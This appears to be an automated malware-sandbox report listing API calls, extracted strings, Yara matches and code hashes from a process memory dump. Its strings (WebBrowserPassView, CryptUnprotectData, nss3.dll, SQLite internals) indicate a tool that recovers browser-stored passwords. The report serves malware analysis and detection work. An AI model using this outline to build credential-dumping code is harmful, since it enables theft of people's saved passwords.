                                                                                                                                                                  • free.MSVCRT(00000000,0044C838,00000000), ref: 00417B46
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PathTemp$free
                                                                                                                                                                  • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                  • API String ID: 924794160-1420421710
                                                                                                                                                                  • Opcode ID: ef23db0a414d9dcf011a3825053a170985a18b01ba0b77813df6364c9434a8ca
                                                                                                                                                                  • Instruction ID: 98cb418060ea171a52ad1c8f6cb6bf58db0dc7ae7347cd78cc57f1029aea62d9
                                                                                                                                                                  • Opcode Fuzzy Hash: ef23db0a414d9dcf011a3825053a170985a18b01ba0b77813df6364c9434a8ca
                                                                                                                                                                  • Instruction Fuzzy Hash: F8314B3160C2595AE730A7659C41BFB73AD9F6434CF2404AFE481C2182EF6CEEC58A5D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040D611
                                                                                                                                                                    • Part of subcall function 004147A8: memcpy.MSVCRT ref: 00414825
                                                                                                                                                                    • Part of subcall function 0040CDFA: wcscpy.MSVCRT ref: 0040CDFF
                                                                                                                                                                    • Part of subcall function 0040CDFA: _wcslwr.MSVCRT ref: 0040CE3A
                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040D65B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                  • API String ID: 1775345501-2769808009
                                                                                                                                                                  • Opcode ID: bd6149e99cc7a28de9a93ba740ac90c598832ca3e2003f992b14148a88f33169
                                                                                                                                                                  • Instruction ID: be7e472b8ae12577d0ef69e4d5a2bd87498dbd4f23eec6cc8c98af6d964d1ad5
                                                                                                                                                                  • Opcode Fuzzy Hash: bd6149e99cc7a28de9a93ba740ac90c598832ca3e2003f992b14148a88f33169
                                                                                                                                                                  • Instruction Fuzzy Hash: 3E11C13160031ABBEB11AB65CCC6E997B25FF08708F100026F809676A2C739F961DBC9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040F329
                                                                                                                                                                    • Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D
                                                                                                                                                                  • wcsrchr.MSVCRT ref: 0040F343
                                                                                                                                                                  • wcscat.MSVCRT ref: 0040F35F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                  • String ID: .cfg$General
                                                                                                                                                                  • API String ID: 776488737-1188829934
                                                                                                                                                                  • Opcode ID: 3c04ec66949ca4b58d7f719b2f0ee793d98d67a51e79d319996db7eeb5c734b3
                                                                                                                                                                  • Instruction ID: 56bea33938f28168157b0b8bcc93b38caa6b0521648f49714e8bc2d05d89a73e
                                                                                                                                                                  • Opcode Fuzzy Hash: 3c04ec66949ca4b58d7f719b2f0ee793d98d67a51e79d319996db7eeb5c734b3
                                                                                                                                                                  • Instruction Fuzzy Hash: 831186769013289ADF20EF55CC85ACE7378FF48754F1041FBE508A7142DB789A858B99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 0040FBF3
                                                                                                                                                                  • RegisterClassW.USER32 ref: 0040FC18
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040FC1F
                                                                                                                                                                  • CreateWindowExW.USER32 ref: 0040FC3E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                  • String ID: WebBrowserPassView
                                                                                                                                                                  • API String ID: 2678498856-2171583229
                                                                                                                                                                  • Opcode ID: 83b8f8d6c3154c4bdd4fc1cc3252cc631093d3cfb7f7179f48de14d9357ef2dd
                                                                                                                                                                  • Instruction ID: f352fd5291e0f9f707763c8e0c0f79a6b8b327092a808c719acfd4fe52221a97
                                                                                                                                                                  • Opcode Fuzzy Hash: 83b8f8d6c3154c4bdd4fc1cc3252cc631093d3cfb7f7179f48de14d9357ef2dd
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E01C4B1D02629ABDB01DF998C89ADFBEBCFF09750F108116F514E6241D7B45A408BE9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
• LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004027E9,?,00000090,00000000,?), ref: 00403BC8
• GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403BDA
• FreeLibrary.KERNEL32(00000000), ref: 00403BFD
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: CryptUnprotectData$crypt32.dll
• API String ID: 145871493-1827663648
• Opcode ID: 5a4a0124d32878fe9075046ef856c222503c42c3ca474c9d5839c12a83985592
• Instruction ID: 6d08c6472c4a7eef0e99d7de69836aa1542f25023555ecd08c966f49be56efdf
• Instruction Fuzzy Hash: B3012C36508A419BDB318F168D4881BFEF9EFE1741B25482EE0C6E2261D7799980CB54

APIs
• wcscpy.MSVCRT ref: 004140A9
• wcscpy.MSVCRT ref: 004140C4
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000,0040F398,00000000,?,0040F398,?,General,?), ref: 004140EB
• CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000001), ref: 004140F2
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: wcscpy$CloseCreateFileHandle
• String ID: General
• API String ID: 999786162-26480598
• Opcode ID: b82796398bdfff255fd1f18aa51d55e941ea69e93fc42597b2932e96296840f9
• Instruction ID: 886da17c1b1bf2e9de85dc8b7e1e57be2bc6bdc909f117fec59c49a827307fb5
• Instruction Fuzzy Hash: 6BF059B3408701AFF7209B919C85E9B7BDCEB98318F11842FF21991011DB384C4486A9

APIs
• GetLastError.KERNEL32(00000000,?,0040DEA5,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000,00000000), ref: 00407E08
• _snwprintf.MSVCRT ref: 00407E35
• MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00407E4E
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLastMessage_snwprintf
• String ID: Error$Error %d: %s
• API String ID: 313946961-1552265934
• Opcode ID: a75c3089e7e966da0bd638cb6b9ab9d800269499d53a23e07f81a9ce3fd34d46
• Instruction ID: b00963ac5392a62de3320d989648915026267cceceb2d36b0a398715d1e41bd5
• Instruction Fuzzy Hash: B9F0A77694060867EF11A794CC06FDA73ACBB84791F1400BBF945E2181DAB8EA854A69

APIs
• LoadLibraryW.KERNEL32(shlwapi.dll,73FB48C0,?,00404C4C,00000000), ref: 00414746
• GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00414754
• FreeLibrary.KERNEL32(00000000,?,00404C4C,00000000), ref: 0041476C
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 145871493-1506664499
• Opcode ID: 86042acc96e33f1a31b74afa18de2a5d13a01f1e05fbb0343d8f5c10d07cce3a
• Instruction ID: 374e307410260eae357c848a0ac8b8d2ed108e4990ae0ebeecf0dac054c84ad8
• Instruction Fuzzy Hash: B1D05B397005206BEA5167366C48FEF3A55EFC7B517154031F910D2261DB648C0285AD

Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• String ID: foreign key constraint failed$new$oid$old
• API String ID: 0-1953309616
• Opcode ID: e023502b744750f4b23ffe04e2ae5b216edfebde367b4abfa2077d4614065f4c
• Instruction ID: aa3871157cb2c29edb2d7db9a5a62b5d9e1ddd85e1ada7e098d24c65e5f6a169
• Instruction Fuzzy Hash: 60E1BF71E00209EFDB14DFA5D981AAEBBB5FF48304F10806AE805AB341DB78AD51CB95

Strings
• number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430F42
• unknown column "%s" in foreign key definition, xrefs: 004310A5
• foreign key on %s should reference only one column of table %T, xrefs: 00430F1A
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memcpy
• String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
• API String ID: 3510742995-272990098
• Opcode ID: a27afdf262ea2b2f13aa3d7c6496d52117a55a242e1c635bc0b46c3f4d569d41
• Instruction ID: b4e089481029338f932d4991b26cccaedb5970869045d73953a00dcfe725fe6b
• Instruction Fuzzy Hash: 10914B75A00209DFCB24DF59C480A9EBBF1FF48304F15819AE809AB312D739E942CF99

Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: memsetwcslen$wcscatwcscpy
• String ID: nss3.dll
• API String ID: 1250441359-2492180550
• Opcode ID: 09e33b56ee97e3876529d6a1dbd088a7e67531a27dd58c4da1fdcc6a23c597f8
• Instruction ID: 1e34d79d1f5922d0320f8d763ab64a9784b47cc615ba08cf08abcfcfe76fb249
• Instruction Fuzzy Hash: D511ECF290121D96EB10EB60DD49BC673BC9B15314F1004BBE60DF21C1FB79DA548A5D

APIs
  • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C127
  • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C135
  • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C146
  • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C15D
  • Part of subcall function 0040C11B: ??3@YAXPAX@Z.MSVCRT ref: 0040C166
• ??3@YAXPAX@Z.MSVCRT ref: 0040C19C
• ??3@YAXPAX@Z.MSVCRT ref: 0040C1AF
• ??3@YAXPAX@Z.MSVCRT ref: 0040C1C2
• ??3@YAXPAX@Z.MSVCRT ref: 0040C1D5
• free.MSVCRT(00000000), ref: 0040C20E
  • Part of subcall function 00408F1E: free.MSVCRT(00000000,004092A3,00000000,?,00000000), ref: 00408F25
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ??3@$free
• API String ID: 2241099983-0
• Opcode ID: b651c62b607cea7bb0db53ebb6174c0f1cadef425dc2d358b3fe847b53385816
• Instruction ID: 1b724bf31a54a7cffb96c88967fdb5b0379f9a1dee2f65518d31c165403446cb
• Instruction Fuzzy Hash: 6E01E532905A31D7D6257B7AA68151FB396BEC2710316026FF845BB2C38F3C6C414ADD

APIs
• AreFileApisANSI.KERNEL32 ref: 00416DB2
• WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00416DD2
• malloc.MSVCRT ref: 00416DD8
• WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00416DF6
• free.MSVCRT(?), ref: 00416DFF
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ByteCharMultiWide$ApisFilefreemalloc
• API String ID: 4053608372-0
• Opcode ID: 8b75c47431a11f52c87324c6af9dbd18f9e3b72bc027a16140cc791be9c4b708
• Instruction ID: 7c4f126962bd8a7e2ff3a65b0fa2dbedc4b8b396d66bab6395f0ad674673df12
• Instruction Fuzzy Hash: B501C8B550411DBF7F115FA5ECC1CFF7AACEA453E8721032AF414E2190D6348E405AB8

APIs
• GetParent.USER32(?), ref: 0040B620
• GetWindowRect.USER32 ref: 0040B62D
• GetClientRect.USER32 ref: 0040B638
• MapWindowPoints.USER32 ref: 0040B648
• SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040B664
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Window$Rect$ClientParentPoints
• String ID:
• API String ID: 4247780290-0
• Opcode ID: 4132645c0205fca9f5305145dfaca5e8ad85c8db49ac0fde3fc8653dad27a9db
• Instruction ID: 46ce5f71d2b2052eec3e6930e994fa0a792d7dbc784fe0d7727ff2cdb1cfdf95
• Opcode Fuzzy Hash: 4132645c0205fca9f5305145dfaca5e8ad85c8db49ac0fde3fc8653dad27a9db
• Instruction Fuzzy Hash: 9D014836401129BBDB119BA59C49EFFBFBCFF06755F04402AFD01A2181D77895028BA9
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
• GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000000,0041274B,?,?), ref: 00444310
• ??2@YAPAXI@Z.MSVCRT ref: 00444324
• memset.MSVCRT ref: 00444333
  • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
• ??3@YAXPAX@Z.MSVCRT ref: 00444356
  • Part of subcall function 004440EA: memchr.MSVCRT ref: 00444125
  • Part of subcall function 004440EA: memcpy.MSVCRT ref: 004441C9
  • Part of subcall function 004440EA: memcpy.MSVCRT ref: 004441DB
  • Part of subcall function 004440EA: memcpy.MSVCRT ref: 00444203
• CloseHandle.KERNEL32(00000000), ref: 0044435D
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
• String ID:
• API String ID: 1471605966-0
• Opcode ID: d675db4136e80266a2e6e489a5d886d4055744e95b8a0a787b2a16d9fa1a1fa5
• Instruction ID: 37ddc15cde46eb5ec9a675e84f83cfdfb4636f792b79cf1c8c19bfac071e4967
• Opcode Fuzzy Hash: d675db4136e80266a2e6e489a5d886d4055744e95b8a0a787b2a16d9fa1a1fa5
• Instruction Fuzzy Hash: 64F0C8765006106AE2203732AC89F6B2B5C9FD6761F14043FF916911D2EE2C98148179
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: 9db751b9d40129ff607a2ad0f7b23477c9a1a0d584d2dc8bf4dbc2e5fe3abfdd
• Instruction ID: ce0d416df33b84177c5a77da38496f7ed087613ba8a01eb08bd82b7dd0746caf
• Opcode Fuzzy Hash: 9db751b9d40129ff607a2ad0f7b23477c9a1a0d584d2dc8bf4dbc2e5fe3abfdd
• Instruction Fuzzy Hash: D0F049B25047018FE720AFA9E9C091BF3E9AB49714761093FF049D7682DB7CAC808A0C
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040D937
• memset.MSVCRT ref: 0040D94E
  • Part of subcall function 0040CDFA: wcscpy.MSVCRT ref: 0040CDFF
  • Part of subcall function 0040CDFA: _wcslwr.MSVCRT ref: 0040CE3A
• _snwprintf.MSVCRT ref: 0040D97D
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: memset$_snwprintf_wcslwrwcscpy
• String ID: </%s>
• API String ID: 3400436232-259020660
• Opcode ID: d4b96116a3886d925e69f09e1e7aa17f767efc24742795cd823dba6d7b972355
• Instruction ID: 1f907657c5db402736beb96cf917ebbb27e5637f268f278bd00e4de1d3b551c4
• Opcode Fuzzy Hash: d4b96116a3886d925e69f09e1e7aa17f767efc24742795cd823dba6d7b972355
• Instruction Fuzzy Hash: A701D6B2D4022967E720A755CC45FEA776CEF45308F0400B6BB08B3181DB78DA458AA8
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ChildEnumTextWindowWindowsmemset
• String ID: caption
• API String ID: 1523050162-4135340389
• Opcode ID: a680237547b71f84e7c5f21b380628042884f9aaba9d4c49a1fa12d06f7ec414
• Instruction ID: 685c7242f617fb3ba1e31657fb4388fb0a14aaa92a56732ea005dddfaa5a5635
• Opcode Fuzzy Hash: a680237547b71f84e7c5f21b380628042884f9aaba9d4c49a1fa12d06f7ec414
• Instruction Fuzzy Hash: B1F0AF369007186AFB20AB54DC4AB9A326CEB41705F4000B6FA04B71D2DBB8ED80CADC
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FileNameOpenwcscpy
• String ID: X$xK@
• API String ID: 3246554996-3735201224
• Opcode ID: 908a77b3f0a760ced81f36d2d2ae0a58bf516f7094468664e135c5813428c6fa
• Instruction ID: b0b1e818a48a7f3500c0daa10f1625907e8ff6cd2dadba3970951ebcab59a6c3
• Opcode Fuzzy Hash: 908a77b3f0a760ced81f36d2d2ae0a58bf516f7094468664e135c5813428c6fa
• Instruction Fuzzy Hash: 28015FB1D0064C9FDB41DFE9D8856CEBBF4AB09314F10802AE869F6240EB7495458F55
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004082B5: memset.MSVCRT ref: 004082BF
  • Part of subcall function 004082B5: wcscpy.MSVCRT ref: 004082FF
• CreateFontIndirectW.GDI32(?), ref: 0040105D
• SendDlgItemMessageW.USER32 ref: 0040107C
• SendDlgItemMessageW.USER32 ref: 0040109A
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
• String ID: MS Sans Serif
• API String ID: 210187428-168460110
• Opcode ID: e453892ad263d581ed8c07d327965f5779054c40888fa458c6814bb6aa3c3a7a
• Instruction ID: 6a7807da2d6c22504d803769321e4de0e3b0b92c14fc4c1b5eee7474059f757a
• Opcode Fuzzy Hash: e453892ad263d581ed8c07d327965f5779054c40888fa458c6814bb6aa3c3a7a
• Instruction Fuzzy Hash: 9EF08275A40B0877EA31ABA0DC06F9A77B9B740B41F000939F751B91D1D7F5A185CA98
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ClassName_wcsicmpmemset
• String ID: edit
• API String ID: 2747424523-2167791130
• Opcode ID: ebec61093d08ec7c11ef9b525731133b20f87b1b8314aca5ccae6d1865a8b1c0
• Instruction ID: 157984a491cfffbc22861ef67f020c4accef2e0f69a1167183a5ff10ddf0174f
• Opcode Fuzzy Hash: ebec61093d08ec7c11ef9b525731133b20f87b1b8314aca5ccae6d1865a8b1c0
• Instruction Fuzzy Hash: A2E04872D9031D6AFB10ABA0DC4EFAD77ACAB01748F1001B5B915E10D3EBB896454B45
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(shell32.dll,0040FF7C,00000000,?,00000002,?,004448C6,00000000,?,0000000A), ref: 004144B9
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004144CE
Strings
Memory Dump Source
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: SHGetSpecialFolderPathW$shell32.dll
• API String ID: 2574300362-880857682
• Opcode ID: ec0b550a6f005db750ce1d6b24d12bf1fdfb92314774ed3a2a33578eaf871c9d
• Instruction ID: 5adcb90289d93a3714d1f61360fd38a26edcd17bcdb04c713309b7dc063e595c
• Opcode Fuzzy Hash: ec0b550a6f005db750ce1d6b24d12bf1fdfb92314774ed3a2a33578eaf871c9d
• Instruction Fuzzy Hash: 89D0C9BCD00304BFEB014F30AC8A70636A8B760BD7F10503AE001D1662EB78C1908B9C
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy$memcmp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3384217055-0
                                                                                                                                                                  • Opcode ID: b9ae8adf615f369c02f25eb7107bc5ea448d3aeb9579db06496db9a03d397097
                                                                                                                                                                  • Instruction ID: 09945ccab50a33f31b382fa22860e11bd1319c866f4a66b9fbc9fb0ddb64ce7b
                                                                                                                                                                  • Opcode Fuzzy Hash: b9ae8adf615f369c02f25eb7107bc5ea448d3aeb9579db06496db9a03d397097
                                                                                                                                                                  • Instruction Fuzzy Hash: 2C21A4B2E14248ABDB18DBA5DC45FDF73FCAB85704F10442AF511D7181EA38E644C724
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$memcpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 368790112-0
                                                                                                                                                                  • Opcode ID: f4caee9e838a04182d96899108f95e0bb2b5edd837a40d922fdd0fc6967a6baf
                                                                                                                                                                  • Instruction ID: ff146c4b72cd3461ea0581b3b06c61829aab73f766a4367807c7cf9141d7c205
                                                                                                                                                                  • Opcode Fuzzy Hash: f4caee9e838a04182d96899108f95e0bb2b5edd837a40d922fdd0fc6967a6baf
                                                                                                                                                                  • Instruction Fuzzy Hash: 8C0128B1640B0066E2316B25CC07F5A73A4AFD2714F50061EF142666C2DFECE544815C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004019F1: GetMenu.USER32 ref: 00401A0F
                                                                                                                                                                    • Part of subcall function 004019F1: GetSubMenu.USER32(00000000), ref: 00401A16
                                                                                                                                                                    • Part of subcall function 004019F1: EnableMenuItem.USER32 ref: 00401A2E
                                                                                                                                                                    • Part of subcall function 00401A38: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A4F
                                                                                                                                                                    • Part of subcall function 00401A38: SendMessageW.USER32(?,00000411,?,?), ref: 00401A73
                                                                                                                                                                  • GetMenu.USER32 ref: 0040E7C9
                                                                                                                                                                  • GetSubMenu.USER32(00000000), ref: 0040E7D6
                                                                                                                                                                  • GetSubMenu.USER32(00000000), ref: 0040E7D9
                                                                                                                                                                  • CheckMenuRadioItem.USER32 ref: 0040E7E5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1889144086-0
                                                                                                                                                                  • Opcode ID: 83a0e922cd1e8dee9c6445d434e826569a79f8e3c030a9086352cee87eac6e04
                                                                                                                                                                  • Instruction ID: 25cc4134299d990fe6d22a23efa4e99655f13f9d527333d0ba489a0a70db3f06
                                                                                                                                                                  • Opcode Fuzzy Hash: 83a0e922cd1e8dee9c6445d434e826569a79f8e3c030a9086352cee87eac6e04
                                                                                                                                                                  • Instruction Fuzzy Hash: EF519071B40604BBEB20ABA6CD4AF8FBAB9EB44704F00056DB248B72E2C6756D50DB54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004179D3
                                                                                                                                                                  • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004179FE
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00417A25
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00417A3B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1661045500-0
                                                                                                                                                                  • Opcode ID: 8b809883c8012823d0c604d21937cfd29b6daf262b7c2114f35c7c6c66a95aef
                                                                                                                                                                  • Instruction ID: 2596ed0fad154ed29ebf4184e1ce6d35beb67abfb73833eacff1bbd48ddff306
                                                                                                                                                                  • Opcode Fuzzy Hash: 8b809883c8012823d0c604d21937cfd29b6daf262b7c2114f35c7c6c66a95aef
                                                                                                                                                                  • Instruction Fuzzy Hash: 0A516EB02087019FEB14CF25C981AABB7F5FF84344F10592EE88287A51E734F994CB59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004153D6: memset.MSVCRT ref: 004153F0
                                                                                                                                                                  • memcpy.MSVCRT ref: 0042E519
                                                                                                                                                                  Strings
                                                                                                                                                                  • sqlite_altertab_%s, xrefs: 0042E4EA
                                                                                                                                                                  • virtual tables may not be altered, xrefs: 0042E470
                                                                                                                                                                  • Cannot add a column to a view, xrefs: 0042E486
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                  • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                                  • API String ID: 1297977491-2063813899
                                                                                                                                                                  • Opcode ID: 3f378335f80cc59d7eb135424ddc91f3ec91bec2b91706fd248cd0de38cf87d4
                                                                                                                                                                  • Instruction ID: bc03cdfccc2981246e0f5b9510b3d89990825f97592217a3aee3a84e95ce5e7f
                                                                                                                                                                  • Opcode Fuzzy Hash: 3f378335f80cc59d7eb135424ddc91f3ec91bec2b91706fd248cd0de38cf87d4
                                                                                                                                                                  • Instruction Fuzzy Hash: E741B071A10215EFDB00DFA9D881A99B7F0FF48318F54815BE858DB352E778E990CB88
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                  • String ID: $, $CREATE TABLE
                                                                                                                                                                  • API String ID: 3510742995-3459038510
                                                                                                                                                                  • Opcode ID: 1040b4c337cd7faea4ce64fd031e57caaf4286bff9d4d2ce94e46056063ae749
                                                                                                                                                                  • Instruction ID: 9113deda8d77e919ddbf50a6a1bf1eccfd02e82bbda2be63f83ad5433933bd3d
                                                                                                                                                                  • Opcode Fuzzy Hash: 1040b4c337cd7faea4ce64fd031e57caaf4286bff9d4d2ce94e46056063ae749
